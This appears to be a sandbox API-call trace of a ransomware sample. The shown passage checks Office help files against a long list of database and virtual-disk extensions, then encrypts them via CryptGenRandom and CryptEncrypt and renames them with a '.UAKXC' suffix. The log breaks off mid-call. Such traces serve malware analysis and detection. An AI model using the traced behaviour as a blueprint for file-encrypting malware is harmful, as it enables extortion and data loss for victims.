[0141.096] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".tmd") returned 0x0 [0141.096] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".tps") returned 0x0 [0141.096] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".trc") returned 0x0 [0141.096] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".trm") returned 0x0 [0141.096] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".udb") returned 0x0 [0141.096] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".udl") returned 0x0 [0141.096] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".usr") returned 0x0 [0141.096] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".v12") returned 0x0 [0141.096] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".vis") returned 0x0 [0141.096] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".vpd") returned 0x0 [0141.096] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".vvv") returned 0x0 [0141.096] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".wdb") returned 0x0 [0141.096] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".wmdb") returned 0x0 [0141.096] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".wrk") returned 0x0 [0141.097] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".xdb") returned 0x0 [0141.097] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".xld") returned 0x0 [0141.097] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".xmlff") returned 0x0 [0141.097] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".abcddb") returned 0x0 [0141.097] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".abs") returned 0x0 [0141.097] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".abx") returned 0x0 [0141.097] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".accdw") returned 0x0 [0141.097] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".adn") returned 0x0 [0141.097] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".db2") returned 0x0 [0141.097] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".fm5") returned 0x0 [0141.097] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".hjt") returned 0x0 [0141.097] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".icg") returned 0x0 [0141.097] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".icr") returned 0x0 [0141.097] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".kdb") returned 0x0 [0141.097] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".lut") returned 0x0 [0141.097] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".maw") returned 0x0 [0141.097] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".mdn") returned 0x0 [0141.097] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".mdt") returned 0x0 [0141.097] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".vdi") returned 0x0 [0141.097] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".vhd") returned 0x0 [0141.098] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".vmdk") returned 0x0 [0141.098] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".pvm") returned 0x0 [0141.098] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".vmem") returned 0x0 [0141.098] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".vmsn") returned 0x0 [0141.098] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".vmsd") returned 0x0 [0141.098] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".nvram") returned 0x0 [0141.098] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".vmx") returned 0x0 [0141.098] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".raw") returned 0x0 [0141.098] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".qcow2") returned 0x0 [0141.098] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".subvol") returned 0x0 [0141.098] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".bin") returned 0x0 [0141.098] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".vsv") returned 0x0 [0141.098] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".avhd") returned 0x0 [0141.098] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".vmrs") returned 0x0 [0141.098] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".vhdx") returned 0x0 [0141.098] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".avdx") returned 0x0 [0141.098] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".vmcx") returned 0x0 [0141.098] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".iso") returned 0x0 [0141.098] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.099] WriteFile (in: hFile=0x210, lpBuffer=0x373fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x373fc78, lpOverlapped=0x0 | out: lpBuffer=0x373fd70*, lpNumberOfBytesWritten=0x373fc78*=0x20c, lpOverlapped=0x0) returned 1 [0141.123] WriteFile (in: hFile=0x210, lpBuffer=0x373fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x373fc7c, lpOverlapped=0x0 | out: lpBuffer=0x373fc80*, lpNumberOfBytesWritten=0x373fc7c*=0xa, lpOverlapped=0x0) returned 1 [0141.123] SetEndOfFile (hFile=0x210) returned 1 [0141.136] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.136] ReadFile (in: hFile=0x210, lpBuffer=0x4100000, nNumberOfBytesToRead=0x152, lpNumberOfBytesRead=0x373fc88, lpOverlapped=0x0 | out: lpBuffer=0x4100000*, lpNumberOfBytesRead=0x373fc88*=0x152, lpOverlapped=0x0) returned 1 [0141.136] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0xfffffeae, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.136] WriteFile (in: hFile=0x210, lpBuffer=0x4100000*, nNumberOfBytesToWrite=0x152, lpNumberOfBytesWritten=0x373fc44, lpOverlapped=0x0 | out: lpBuffer=0x4100000*, lpNumberOfBytesWritten=0x373fc44*=0x152, lpOverlapped=0x0) returned 1 [0141.136] CloseHandle (hObject=0x210) returned 1 [0141.139] GetProcessHeap () returned 0xea0000 [0141.139] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0xefe4b8 [0141.139] lstrcpyW (in: lpString1=0xefe4b8, lpString2="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn" | out: lpString1="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn") returned="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn" [0141.139] lstrcatW (in: lpString1="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpString2=".UAKXC" | out: lpString1="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn.UAKXC") returned="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn.UAKXC" [0141.139] MoveFileW (lpExistingFileName="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.outlook.14.1033.hxn"), lpNewFileName="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn.UAKXC" (normalized: "c:\\programdata\\microsoft help\\ms.outlook.14.1033.hxn.uakxc")) returned 1 [0141.140] GetProcessHeap () returned 0xea0000 [0141.140] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xefe4b8 | out: hHeap=0xea0000) returned 1 [0141.140] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeeef0 | out: hHeap=0xea0000) returned 1 [0141.140] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2600 | out: hHeap=0xea0000) returned 1 [0141.140] CryptGenRandom (in: hProv=0xece568, dwLen=0x20, pbBuffer=0x373fd50 | out: pbBuffer=0x373fd50) returned 1 [0141.140] CryptGenRandom (in: hProv=0xece568, dwLen=0x8, pbBuffer=0x373fd48 | out: pbBuffer=0x373fd48) returned 1 [0141.140] CryptEncrypt (in: hKey=0xece4f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x200) returned 1 [0141.141] GetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.powerpnt.dev.14.1033.hxn")) returned 0x2022 [0141.151] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.powerpnt.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0141.151] GetLastError () returned 0x0 [0141.151] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x373fc88 | out: lpFileSize=0x373fc88*=368) returned 1 [0141.151] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".4dd") returned 0x0 [0141.151] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".4dl") returned 0x0 [0141.151] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".accdb") returned 0x0 [0141.151] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".accdc") returned 0x0 [0141.151] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".accde") returned 0x0 [0141.151] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".accdr") returned 0x0 [0141.151] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".accdt") returned 0x0 [0141.151] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".accft") returned 0x0 [0141.151] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".adb") returned 0x0 [0141.151] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".ade") returned 0x0 [0141.151] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".adf") returned 0x0 [0141.151] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".adp") returned 0x0 [0141.151] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".arc") returned 0x0 [0141.151] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".ora") returned 0x0 [0141.152] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".alf") returned 0x0 [0141.152] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".ask") returned 0x0 [0141.152] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".btr") returned 0x0 [0141.152] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".bdf") returned 0x0 [0141.152] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".cat") returned 0x0 [0141.152] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".cdb") returned 0x0 [0141.152] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".ckp") returned 0x0 [0141.152] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".cma") returned 0x0 [0141.152] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".cpd") returned 0x0 [0141.152] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".dacpac") returned 0x0 [0141.152] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".dad") returned 0x0 [0141.152] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".dadiagrams") returned 0x0 [0141.152] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".daschema") returned 0x0 [0141.152] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".db") returned 0x0 [0141.152] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".db-shm") returned 0x0 [0141.152] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".db-wal") returned 0x0 [0141.152] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".db3") returned 0x0 [0141.152] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".dbc") returned 0x0 [0141.152] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".dbf") returned 0x0 [0141.152] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".dbs") returned 0x0 [0141.152] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".dbt") returned 0x0 [0141.153] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".dbv") returned 0x0 [0141.153] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".dbx") returned 0x0 [0141.153] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".dcb") returned 0x0 [0141.153] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".dct") returned 0x0 [0141.153] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".dcx") returned 0x0 [0141.153] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".ddl") returned 0x0 [0141.153] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".dlis") returned 0x0 [0141.153] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".dp1") returned 0x0 [0141.153] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".dqy") returned 0x0 [0141.153] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".dsk") returned 0x0 [0141.153] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".dsn") returned 0x0 [0141.153] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".dtsx") returned 0x0 [0141.153] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".dxl") returned 0x0 [0141.153] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".eco") returned 0x0 [0141.153] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".ecx") returned 0x0 [0141.153] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".edb") returned 0x0 [0141.153] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".epim") returned 0x0 [0141.153] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".exb") returned 0x0 [0141.153] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".fcd") returned 0x0 [0141.153] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".fdb") returned 0x0 [0141.153] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".fic") returned 0x0 [0141.153] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".fmp") returned 0x0 [0141.153] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".fmp12") returned 0x0 [0141.154] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".fmpsl") returned 0x0 [0141.154] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".fol") returned 0x0 [0141.154] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".fp3") returned 0x0 [0141.154] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".fp4") returned 0x0 [0141.154] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".fp5") returned 0x0 [0141.154] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".fp7") returned 0x0 [0141.154] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".fpt") returned 0x0 [0141.154] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".frm") returned 0x0 [0141.154] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".gdb") returned 0x0 [0141.154] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".grdb") returned 0x0 [0141.154] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".gwi") returned 0x0 [0141.154] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".hdb") returned 0x0 [0141.154] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".his") returned 0x0 [0141.154] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".ib") returned 0x0 [0141.154] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".idb") returned 0x0 [0141.154] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".ihx") returned 0x0 [0141.154] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".itdb") returned 0x0 [0141.154] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".itw") returned 0x0 [0141.154] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".jet") returned 0x0 [0141.154] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".jtx") returned 0x0 [0141.154] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".kdb") returned 0x0 [0141.154] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".kexi") returned 0x0 [0141.154] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".kexic") returned 0x0 [0141.155] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".kexis") returned 0x0 [0141.155] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".lgc") returned 0x0 [0141.155] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".lwx") returned 0x0 [0141.155] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".maf") returned 0x0 [0141.155] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".maq") returned 0x0 [0141.155] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".mar") returned 0x0 [0141.155] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".mas") returned 0x0 [0141.155] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".mav") returned 0x0 [0141.155] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".mdb") returned 0x0 [0141.155] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".mdf") returned 0x0 [0141.155] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".mpd") returned 0x0 [0141.155] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".mrg") returned 0x0 [0141.155] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".mud") returned 0x0 [0141.155] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".mwb") returned 0x0 [0141.155] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".myd") returned 0x0 [0141.155] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".ndf") returned 0x0 [0141.155] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".nnt") returned 0x0 [0141.155] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".nrmlib") returned 0x0 [0141.155] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".ns2") returned 0x0 [0141.155] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".ns3") returned 0x0 [0141.155] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".ns4") returned 0x0 [0141.155] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".nsf") returned 0x0 [0141.155] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".nv") returned 0x0 [0141.155] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".nv2") returned 0x0 [0141.155] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".nwdb") returned 0x0 [0141.155] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".nyf") returned 0x0 [0141.156] StrStrIW 